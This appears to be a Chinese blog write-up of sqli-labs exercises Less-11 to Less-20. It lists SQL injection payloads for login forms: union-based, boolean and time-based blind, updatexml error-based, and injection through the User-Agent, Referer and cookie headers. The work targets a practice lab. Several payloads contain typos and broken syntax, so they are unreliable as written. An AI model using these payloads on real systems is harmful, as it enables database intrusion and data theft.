sql注入Less11-20

Less-11(POST)

1.先登录 ,在表格中输入admin admin
在这里插入图片描述
登录成功后为下图

在这里插入图片描述
2.在post data中输入以下

uname='&passwd=1&submit=submit//返回的结果显示存在sql语法错误,证明存在注入漏洞
uname=a' or 1=1 #&passwd=a&submit=submit//登陆成功,可以验证存在注入漏洞
uname=a' order by 3#&passwd=a&submit=submit//判断出只有两列
uname=a&passwd=a' union select database(),2 #&submit=submit//查询到当前数据库为security
uname=a' union select 1,(select schema_name from information_schemata limit1,1)#
uname=a'union select1,(select group_concat(table_name)from information_schema.tables where table_schema=0x7365637572697479#passwd=a&submit=submit//可以得到security数据库中的所有表的信息

Less-12

uname=1&password=1")报错其他操作和Less-11相同

Less-13

uname=admin&passwd=admin&submit=Submit//只显示登录成功。但不显示其他信息
uname='&passwd=a&submit=Submit//构造1') or 1-1#
uname=admin') order by 2 # &passwd=admin&submit=Submit//只显示登录成功,不显示其他信息,考虑盲注
unmae=admin') or if(length(database())=8,1,sleep(5)# &passwd=admin&submit=Submit //可得到数据库的长度为8
uname=admin&passwd=ain')or left(database(),1)>'a'#submit=Submit 
uname=admin&passwd=ain') or left((select schema_name from information_schema.schemata limit 0,1),1)>'a'#&submit=Submit

Less-14

与less-13的区别为输入内容被放到双引号中,其余相同

Less-15

uname=admin&passwd=a''&submit=Submit//构造1'' or 1-1#
uname=adminadmin&passwd=admiand'or if(length()>1000,1,sleep(5))#submit=Submit//判断长度
uname=adminadmin&passwd=admiand' or if(length()>1000,1,sleep(5))#&submit=Submit
uname=adminadmin&passwd=admiand' or left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)>'a'#&submit=Submit //使用Less-13同样的方法

Less-16

与less-15的区别为1’’)其余相同

Less-17

使用了get_nagic_guotes_gpc name和password 分开验证

unmae=admin&passwd=adm' and updatexm(1,concat(0x7e,(select table_name from information_schema,tables where table_schema='security'limit 0,1),0x7e)#&submit=Submit 
uname=admin&passwd=adm' and updatexm(1,concat(0x7e,(select column_name from information_schemta.columns where table_name='users'limit0,1),0x7e),1)#&submit=Submit

Less-18

' and updatexm(1,concat(0x7e,(database(),0x7e),1)and1'='1
//登陆失败显示IP地址
//登录成功显示IP地址和user-Agent
$insert='INSERT INTO'security''uagents'('uagent','ip_address','username'VALUES'$uagent','$IP',$UNAME)";
//闭合操作为' or updatexm(1,concat(0x7e,(database())),1) and '1'='1
//剩余步骤通过MYSQL注入语句操作即可

Less-19

//登陆成功显示的是Refer信息
//登陆失败没有回显信息
$insert='INSERT INTO''security'.'referers'('referer','ip_adress') VALUES('$uagent','$IP')"
//闭合操作为 ' or updatexm(1,concat(0x7e,(database(),1) and '1'='1

Less-20

//登录成功之后会显示cookie
//登陆失败后会显示失败信息
$sql='SELECT * FROM users WHERE username='$cookee' LIMIT0,1"//登陆成功后后台会将username 放入cookie中,再次登录的时候,只要cookie没有过期,就会去cookie里面取值,然后进行查询
'union select 1,2,database()#
//其余步骤为常见的注入过程

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值